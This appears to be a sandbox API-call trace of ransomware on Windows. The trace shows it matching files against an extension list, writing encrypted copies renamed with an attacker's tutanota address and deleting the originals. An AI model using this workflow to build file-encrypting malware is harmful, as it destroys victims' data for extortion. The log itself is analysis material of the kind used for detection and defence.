WriteFile (in: hFile=0x3a8, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x1c00, lpOverlapped=0x0) returned 1 [0274.368] ReadFile (in: hFile=0x394, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0274.368] WriteFile (in: hFile=0x3a8, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.368] SetEndOfFile (hFile=0x3a8) returned 1 [0274.368] CloseHandle (hObject=0x3a8) returned 1 [0274.368] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.368] SetEndOfFile (hFile=0x394) returned 1 [0274.370] CloseHandle (hObject=0x394) returned 1 [0274.370] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.416] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099161.jpg")) returned 1 [0274.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 63 [0274.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 63 [0274.416] lstrlenW (lpString=".doc") returned 4 [0274.416] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0274.416] lstrlenW (lpString=".docx") returned 5 [0274.416] lstrcmpiW (lpString1=".docx", lpString2="1.JPG") returned -1 [0274.416] lstrlenW (lpString=".pdf") returned 4 [0274.416] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0274.416] lstrlenW (lpString=".xls") returned 4 [0274.416] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0274.416] lstrlenW (lpString=".xlsx") returned 5 [0274.416] lstrcmpiW (lpString1=".xlsx", lpString2="1.JPG") returned -1 [0274.416] lstrlenW (lpString=".ppt") returned 4 [0274.416] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0274.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 63 [0274.416] lstrlenW (lpString=".zip") returned 4 [0274.416] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0274.416] lstrlenW (lpString=".rar") returned 4 [0274.416] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0274.416] lstrlenW (lpString=".bz2") returned 4 [0274.416] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0274.416] lstrlenW (lpString=".7z") returned 3 [0274.416] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0274.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 63 [0274.416] lstrlenW (lpString=".dbf") returned 4 [0274.417] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0274.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 63 [0274.417] lstrlenW (lpString=".1cd") returned 4 [0274.417] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0274.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 63 [0274.417] lstrlenW (lpString=".jpg") returned 4 [0274.417] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0274.423] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=50490) returned 1 [0274.423] CloseHandle (hObject=0x3c0) returned 1 [0274.423] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099165.jpg")) returned 0x20 [0274.430] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099165.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099165.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.430] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.430] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099165.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.431] GetLastError () returned 0x0 [0274.431] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0xc53a, lpOverlapped=0x0) returned 1 [0274.438] WriteFile (in: hFile=0x3c0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xc540, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xc540, lpOverlapped=0x0) returned 1 [0274.439] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0274.439] WriteFile (in: hFile=0x3c0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.439] SetEndOfFile (hFile=0x3c0) returned 1 [0274.439] CloseHandle (hObject=0x3c0) returned 1 [0274.440] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.440] SetEndOfFile (hFile=0x2ac) returned 1 [0274.442] CloseHandle (hObject=0x2ac) returned 1 [0274.443] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.443] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099165.jpg")) returned 1 [0274.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 63 [0274.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 63 [0274.443] lstrlenW (lpString=".doc") returned 4 [0274.443] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0274.443] lstrlenW (lpString=".docx") returned 5 [0274.443] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1 [0274.443] lstrlenW (lpString=".pdf") returned 4 [0274.443] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0274.443] lstrlenW (lpString=".xls") returned 4 [0274.443] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0274.443] lstrlenW (lpString=".xlsx") returned 5 [0274.443] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1 [0274.443] lstrlenW (lpString=".ppt") returned 4 [0274.443] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0274.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 63 [0274.443] lstrlenW (lpString=".zip") returned 4 [0274.443] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0274.443] lstrlenW (lpString=".rar") returned 4 [0274.443] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0274.443] lstrlenW (lpString=".bz2") returned 4 [0274.443] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0274.444] lstrlenW (lpString=".7z") returned 3 [0274.444] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0274.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 63 [0274.444] lstrlenW (lpString=".dbf") returned 4 [0274.444] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0274.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 63 [0274.444] lstrlenW (lpString=".1cd") returned 4 [0274.444] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0274.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG") returned 63 [0274.444] lstrlenW (lpString=".jpg") returned 4 [0274.444] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0274.444] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=43949) returned 1 [0274.444] CloseHandle (hObject=0x2ac) returned 1 [0274.444] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099167.jpg")) returned 0x20 [0274.444] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099167.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099167.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.445] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.445] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099167.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.445] GetLastError () returned 0x0 [0274.445] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0xabad, lpOverlapped=0x0) returned 1 [0274.463] WriteFile (in: hFile=0x3c0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xabb0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xabb0, lpOverlapped=0x0) returned 1 [0274.465] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0274.465] WriteFile (in: hFile=0x3c0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.465] SetEndOfFile (hFile=0x3c0) returned 1 [0274.465] CloseHandle (hObject=0x3c0) returned 1 [0274.465] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.465] SetEndOfFile (hFile=0x2ac) returned 1 [0274.468] CloseHandle (hObject=0x2ac) returned 1 [0274.468] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.468] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099167.jpg")) returned 1 [0274.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 63 [0274.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 63 [0274.470] lstrlenW (lpString=".doc") returned 4 [0274.470] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0274.470] lstrlenW (lpString=".docx") returned 5 [0274.470] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1 [0274.470] lstrlenW (lpString=".pdf") returned 4 [0274.470] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0274.471] lstrlenW (lpString=".xls") returned 4 [0274.471] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0274.471] lstrlenW (lpString=".xlsx") returned 5 [0274.471] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1 [0274.471] lstrlenW (lpString=".ppt") returned 4 [0274.471] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0274.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 63 [0274.471] lstrlenW (lpString=".zip") returned 4 [0274.471] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0274.471] lstrlenW (lpString=".rar") returned 4 [0274.471] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0274.471] lstrlenW (lpString=".bz2") returned 4 [0274.471] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0274.471] lstrlenW (lpString=".7z") returned 3 [0274.471] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0274.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 63 [0274.471] lstrlenW (lpString=".dbf") returned 4 [0274.471] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0274.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 63 [0274.471] lstrlenW (lpString=".1cd") returned 4 [0274.471] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0274.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG") returned 63 [0274.471] lstrlenW (lpString=".jpg") returned 4 [0274.471] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0274.472] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=20179) returned 1 [0274.472] CloseHandle (hObject=0x2ac) returned 1 [0274.472] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099168.jpg")) returned 0x20 [0274.472] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099168.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.472] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099168.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.472] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.472] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.472] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099168.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.472] GetLastError () returned 0x0 [0274.473] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x4ed3, lpOverlapped=0x0) returned 1 [0274.478] WriteFile (in: hFile=0x3c0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x4ee0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x4ee0, lpOverlapped=0x0) returned 1 [0274.479] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0274.479] WriteFile (in: hFile=0x3c0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.479] SetEndOfFile (hFile=0x3c0) returned 1 [0274.479] CloseHandle (hObject=0x3c0) returned 1 [0274.479] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.479] SetEndOfFile (hFile=0x2ac) returned 1 [0274.481] CloseHandle (hObject=0x2ac) returned 1 [0274.481] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.482] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099168.jpg")) returned 1 [0274.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 63 [0274.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 63 [0274.482] lstrlenW (lpString=".doc") returned 4 [0274.482] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0274.482] lstrlenW (lpString=".docx") returned 5 [0274.482] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1 [0274.482] lstrlenW (lpString=".pdf") returned 4 [0274.482] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0274.482] lstrlenW (lpString=".xls") returned 4 [0274.482] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0274.482] lstrlenW (lpString=".xlsx") returned 5 [0274.482] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1 [0274.482] lstrlenW (lpString=".ppt") returned 4 [0274.482] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0274.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 63 [0274.482] lstrlenW (lpString=".zip") returned 4 [0274.482] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0274.482] lstrlenW (lpString=".rar") returned 4 [0274.482] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0274.482] lstrlenW (lpString=".bz2") returned 4 [0274.483] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0274.483] lstrlenW (lpString=".7z") returned 3 [0274.483] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0274.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 63 [0274.483] lstrlenW (lpString=".dbf") returned 4 [0274.483] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0274.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 63 [0274.483] lstrlenW (lpString=".1cd") returned 4 [0274.483] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0274.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG") returned 63 [0274.483] lstrlenW (lpString=".jpg") returned 4 [0274.483] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 Thread: id = 57 os_tid = 0x674 [0263.598] GetTickCount () returned 0x72de [0263.598] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x24) returned 0x5d5c78 [0263.598] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5d5c78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x194 [0263.600] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5d5c78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0263.601] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5d5c78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x19c [0263.602] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x5d5c78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0 [0263.605] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b33c8 [0263.605] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b33c8, Size=0x20) returned 0x5804e0 [0263.605] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b33c8 [0263.605] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b33c8, Size=0x20) returned 0x580508 [0263.605] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76890000 [0263.605] GetProcAddress (hModule=0x76890000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x768bd650 [0263.605] Wow64DisableWow64FsRedirection (in: OldValue=0x2bfff84 | out: OldValue=0x2bfff84*=0x0) returned 1 [0263.605] lstrlenW (lpString="kernel32.dll") returned 12 [0263.605] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5804e0 | out: hHeap=0x520000) returned 1 [0263.605] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0263.605] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x580508 | out: hHeap=0x520000) returned 1 [0263.605] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x5a2ee0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a4 [0263.606] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0263.748] GetTickCount () returned 0x737a [0263.748] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0263.983] GetTickCount () returned 0x7454 [0263.983] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0264.217] GetTickCount () returned 0x753e [0264.217] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0264.532] GetTickCount () returned 0x7676 [0264.532] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0264.731] GetTickCount () returned 0x7741 [0264.731] GetTickCount () returned 0x7741 [0264.731] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0264.919] GetTickCount () returned 0x77fc [0264.919] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0265.134] GetTickCount () returned 0x78c7 [0265.134] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0265.273] GetTickCount () returned 0x7953 [0265.273] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0265.566] GetTickCount () returned 0x7a6c [0265.566] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0265.754] GetTickCount () returned 0x7b27 [0265.754] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0265.860] GetTickCount () returned 0x7b95 [0265.861] GetTickCount () returned 0x7b95 [0265.861] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0266.118] GetTickCount () returned 0x7c8e [0266.118] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0266.270] GetTickCount () returned 0x7d2a [0266.270] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0266.551] GetTickCount () returned 0x7e33 [0266.551] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0266.786] GetTickCount () returned 0x7f1d [0266.786] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0266.890] GetTickCount () returned 0x7f7b [0266.890] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0267.007] GetTickCount () returned 0x7ff8 [0267.007] GetTickCount () returned 0x7ff8 [0267.007] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0267.263] GetTickCount () returned 0x80f1 [0267.263] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0267.386] GetTickCount () returned 0x815f [0267.386] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0267.560] GetTickCount () returned 0x820a [0267.560] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0267.764] GetTickCount () returned 0x82d5 [0267.765] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0267.907] GetTickCount () returned 0x8352 [0267.907] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x64) returned 0x102 [0268.102] 